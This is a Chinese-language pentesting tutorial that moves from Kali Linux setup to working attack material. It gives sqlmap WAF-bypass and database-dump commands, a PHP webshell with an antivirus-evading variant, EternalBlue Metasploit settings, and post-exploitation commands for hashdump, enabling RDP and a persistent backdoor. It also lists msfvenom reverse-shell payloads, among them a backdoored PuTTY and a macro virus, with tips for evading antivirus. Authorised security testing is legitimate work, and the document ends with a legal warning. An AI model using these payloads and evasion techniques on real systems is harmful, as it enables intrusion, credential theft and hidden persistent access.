作为专业渗透测试平台,Kali Linux通常运行在虚拟机环境中。VMware Workstation Pro是最常用的虚拟化平台,其优势在于:
安装时建议配置:
注意:VirtualBox虽然免费,但在网络嗅探和USB设备支持方面存在兼容性问题,专业测试建议优先选择VMware。
国内用户必须更换软件源以解决更新缓慢问题。阿里云和清华源是最稳定的选择:
bash复制# 备份原始源列表
sudo cp /etc/apt/sources.list /etc/apt/sources.list.bak
# 使用nano编辑器修改源
sudo nano /etc/apt/sources.list
清华源配置示例:
code复制deb https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main non-free contrib
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main non-free contrib
更新软件包时常见问题处理:
Hash校验失败:执行sudo apt clean后重试依赖冲突:使用sudo apt --fix-broken install修复apt update && apt upgrade -y && apt full-upgrade -y默认Kali使用英文环境有两大优势:
如需中文界面,还需额外安装:
bash复制sudo apt install fonts-wqy-zenhei fonts-wqy-microhei xfonts-wqy
配置完成后验证:
bash复制# 查看当前语言环境
locale
# 临时切换回英文
export LANG=en_US.UTF-8
sqlmap作为SQL注入神器,其工作原理分为四个阶段:
高级用法示例:
bash复制# 使用Tor网络匿名扫描
sqlmap -u "http://target.com?id=1" --tor --tor-type=SOCKS5
# 绕过WAF检测
sqlmap -u "http://target.com?id=1" --tamper=space2comment
# 导出数据库到文件
sqlmap -u "http://target.com?id=1" --dump-all --output-dir=/root/results
现代WAF常见检测手段及对应绕过方法:
| WAF类型 | 检测特征 | sqlmap绕过参数 |
|---|---|---|
| 云WAF | 流量异常 | --delay=3 --randomize=param |
| 硬件WAF | SQL关键字 | --tamper=between,randomcase |
| 规则引擎 | 请求频率 | --threads=2 --timeout=15 |
实战经验:
--hpp参数(HTTP参数污染)--data='{"id":1}' --headers="Content-Type: application/json"常用WebShell类型对比:
| 类型 | 优点 | 缺点 | 示例 |
|---|---|---|---|
| 一句话木马 | 体积小 | 功能有限 | <?php system($_GET['cmd']);?> |
| 加密木马 | 免杀强 | 需要密钥 | ionCube加密PHP |
| 图形化木马 | 功能全 | 体积大 | 中国菜刀 |
制作免杀WebShell的技巧:
<?php $x='sy'.'stem'; $x($_GET['cmd']); ?>GIF89a<?php...伪装成图片<?= 短标签形式中国蚁剑的流量加密功能配置:
内网穿透场景下的使用:
bash复制# 在VPS上设置端口转发
socat TCP4-LISTEN:8080,fork TCP4:内网IP:80
该漏洞源于Windows SMB协议中的:
影响范围:
永恒之蓝攻击流程优化:
bash复制# 设置不自动迁移进程(避免崩溃)
set AutoRunScript post/windows/manage/migrate
# 使用更稳定的payload
set payload windows/x64/meterpreter/reverse_https
# 启用流量加密
set EnableStageEncoding true
后渗透阶段关键命令:
bash复制# 获取系统信息
sysinfo
# 转储密码哈希
hashdump
# 启用RDP访问
run post/windows/manage/enable_rdp
# 创建持久后门
persistence -X -i 60 -p 443 -r 攻击机IP
生成免杀可执行文件的技巧:
bash复制# 使用编码器迭代
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 -e x86/shikata_ga_nai -i 15 -f exe -o payload.exe
# 捆绑合法程序
msfvenom -x putty.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 -f exe -o putty_backdoor.exe
# 生成宏病毒
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 -f vba-exe -o payload.txt
规避杀毒软件检测的方法:
检测绕过验证方法:
bash复制# 使用VirusTotal API检测
curl -X POST https://www.virustotal.com/vtapi/v2/file/scan --form apiKey=<key> --form file=@payload.exe
必须遵守的三大原则:
专业报告应包含:
重要提示:所有技术仅限授权测试使用,未经授权的渗透测试行为可能触犯《刑法》第285、286条规定的非法侵入计算机信息系统罪和破坏计算机信息系统罪。